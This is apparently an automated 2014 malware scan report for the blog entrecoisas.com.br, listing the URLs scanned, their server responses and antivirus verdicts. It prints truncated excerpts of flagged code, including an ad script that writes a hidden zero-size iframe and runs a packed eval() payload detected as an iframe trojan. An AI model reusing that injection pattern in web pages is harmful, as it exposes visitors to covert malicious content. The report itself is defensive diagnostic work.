Malware Scanner report for entrecoisas.com.br

Malicious/Suspicious/Total urls checked
4/0/20
4 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Scanned pages/files

Request / Server response / Status
http://entrecoisas.com.br/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 18:13:58 GMT
Location: http://www.entrecoisas.com.br/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
clean
http://www.entrecoisas.com.br/
200 OK
Content-Length: 149706
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function stripHtmlTags(s,max){return s.replace(/<.*?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')}
function getSummaryLikeWP(id) {
return document.getElementById(id).innerHTML.split(/<!--\s*more\s*-->/)[0];
}
function getSummaryImproved(post,max){
var re = /<.*?>/gi
var re2 = /<br.*?>/gi
var re3 = /(<\/{1}p>)|(<\/{1}div>)/gi
var re4 = /(<style.*?\/{1}style>)|(<
... 1755 bytes are skipped ...
se {
imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>';
summ = summary_img;
}
}
var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>';
div.innerHTML = summary;
div.style.display = "block";
}
}

Antivirus reports:

Emsisoft
Win32.Worm.Mabezat.Gen (B)

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
200 OK
Content-Length: 55740
Content-Type: text/javascript
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
200 OK
Content-Length: 57254
Content-Type: text/javascript
clean
http://ads.egrana.com.br/anuncio/popup/1567
200 OK
Content-Length: 6553
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe style="display:none" src="http://ads.egrana.com.br/stats/pop/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe>');eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'
... 5916 bytes are skipped ...
ialogHeight|opera|adc|resizeTo|moveTo|opener|750|850|1850|950|141144143141163150|frameborder|hidden|backgroundColor|transparent|opacity|||cursor|pointer|position|absolute|zIndex|999|pageY|pageX|79|form|form141144143141163150|input|type|clearInterval|setInterval|1024|768|a616463736899|documentElement|webkitRequestFullscreen|Element|ALLOW_KEYBOARD_INPUT|webkitCancelFullScreen|a6164637368|data|text|html|charset|utf|encodeURI|536|onclick|2000|beforeunload|loadScript|scripts|pop|js'.split('|'),0,{}))

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-ALS [Trj]
nProtect
Trojan.Iframe.BZW
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.Iframe.BZW
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21217
Content-Type: text/javascript
clean
http://entrecoisas.com.br//cdn.chitika.net/getads.js/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 18:14:00 GMT
Location: http://www.entrecoisas.com.br//cdn.chitika.net/getads.js/
Server: ghs
Content-Length: 254
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
clean
http://www.entrecoisas.com.br//cdn.chitika.net/getads.js/
404 Not Found
Content-Length: 106862
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function stripHtmlTags(s,max){return s.replace(/<.*?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')}
function getSummaryLikeWP(id) {
return document.getElementById(id).innerHTML.split(/<!--\s*more\s*-->/)[0];
}
function getSummaryImproved(post,max){
var re = /<.*?>/gi
var re2 = /<br.*?>/gi
var re3 = /(<\/{1}p>)|(<\/{1}div>)/gi
var re4 = /(<style.*?\/{1}style>)|(<
... 1755 bytes are skipped ...
se {
imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>';
summ = summary_img;
}
}
var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>';
div.innerHTML = summary;
div.style.display = "block";
}
}

Antivirus reports:

Emsisoft
Win32.Worm.Mabezat.Gen (B)

http://lizard1301.spider.ad/spd_display?p1=7855.divSpdSuperBanner
200 OK
Content-Length: 3
Content-Type: text/html
clean
http://lizard1301.spider.ad/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://728x90.exad.me/js/?id=6560
200 OK
Content-Length: 120
Content-Type: text/html
clean
http://www.linkwithin.com/widget.js
200 OK
Content-Length: 14131
Content-Type: application/x-javascript
clean
http://entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 18:14:03 GMT
Location: http://www.entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/
Server: ghs
Content-Length: 268
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
clean
http://www.entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/
404 Not Found
Content-Length: 106918
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function stripHtmlTags(s,max){return s.replace(/<.*?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')}
function getSummaryLikeWP(id) {
return document.getElementById(id).innerHTML.split(/<!--\s*more\s*-->/)[0];
}
function getSummaryImproved(post,max){
var re = /<.*?>/gi
var re2 = /<br.*?>/gi
var re3 = /(<\/{1}p>)|(<\/{1}div>)/gi
var re4 = /(<style.*?\/{1}style>)|(<
... 1755 bytes are skipped ...
se {
imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>';
summ = summary_img;
}
}
var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>';
div.innerHTML = summary;
div.style.display = "block";
}
}

Antivirus reports:

Emsisoft
Win32.Worm.Mabezat.Gen (B)

http://300x250.exad.me/js/?id=6783
200 OK
Content-Length: 121
Content-Type: text/html
clean
http://ads.egrana.com.br/anuncio/300x250/1567
200 OK
Content-Length: 660
Content-Type: text/html
clean
http://ads.egrana.com.br/click.php?f=30&a=99&s=1567
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Jul 2014 18:15:18 GMT
Pragma: no-cache
Location: http://ad.zanox.com/ppc/?26093113C2022580779T
Server: nginx/1.0.15
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Country: LT
Set-Cookie: PHPSESSID=ojgbdrah3g77608nqugiqepq01; path=/
X-Powered-By: PHP/5.4.28
clean
http://ad.zanox.com/ppc/?26093113c2022580779t
HTTP/1.1 302 Found
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Location: /ppc/?26093113c2022580779t
clean
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdRetangulo
200 OK
Content-Length: 3
Content-Type: text/html
clean
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdWideSky
200 OK
Content-Length: 3
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: entrecoisas.com.br

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 18:13:58 GMT
Location: http://www.entrecoisas.com.br/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

...227 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: entrecoisas.com.br
Referer: http://www.google.com/search?q=entrecoisas.com.br

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=entrecoisas.com.br

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://entrecoisas.com.br/

Result: entrecoisas.com.br is not infected or malware details are not published yet.